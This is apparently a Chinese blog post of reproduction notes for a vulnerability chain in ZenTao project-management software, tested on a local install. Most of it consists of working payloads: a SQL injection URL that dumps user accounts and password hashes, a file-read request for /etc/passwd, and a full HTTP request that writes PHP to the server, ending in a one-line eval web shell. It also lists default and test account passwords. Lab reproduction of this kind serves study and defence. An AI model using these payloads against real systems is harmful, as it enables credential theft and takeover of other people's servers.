禅道全版本rce漏洞复现笔记

禅道全版本rce漏洞复现笔记

漏洞说明

禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。
此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所有的项目都受此漏洞影响。本次漏洞复现以ZenTaoPMS.11.6版本作为演示

环境搭建

下载链接:https://www.zentao.net/download/80153.html

解压安装后访问禅道主页 http://127.0.0.1/index.php

查看当前版本 http://127.0.0.1:81/zentao/index.php?mode=getconfig

至此环境搭建成功

漏洞复现

漏洞1 SQL注入

首先我们登录admin/CD87691043cs账户修改默认密码,创建一个普通Test0001/1qaz2wsx3edc!@#$用户并登录

Payload

http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc访问结果如下:

漏洞2 文件读取

Payload

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

Poc访问结果如下:

由于本地环境是window系统,所以没有回显,我们在xampp\zentao\module\api目录下新建一个test文件,读取

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=test

漏洞3 RCE

利用上面的文件读取来执行命令

Payload1

POST /zentao/api-getModel-editor-save-filePath=1111 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=vqruohhgn7qbhveakg04h9e267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

fileContent=<?php phpinfo()?>

先写入一个phpinfo,再读取访问

需要给物理路径加上一层才能包含成功

http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=1111/1

Payload2

fileContent=<?php system('whoami');?>

Payload3(一句话)

fileContent=<?php file_put_contents('E://CMS/ZenTaoPMS/xampp/zentao/www/xxx.php.aaa', '<?php @eval($_REQUEST["x"]);?>');?>

这里是window系统,所以写入绝对路径,绝对路径可以同样用fileContent=<?php getcwd()?>获取

http://127.0.0.1/zentao/xxx.php.aaa?x=phpinfo();

PS:最好使用linux系统安装,windows不要使用一键安装包安装,windows系统安装集成版的话根目录下的php代码好像做了限制,无法执行。

参考链接

【渗透笔记】禅道

禅道全版本rce漏洞分析

posted @ 2020-07-11 19:22  只言  阅读(22195)  评论(0编辑  收藏  举报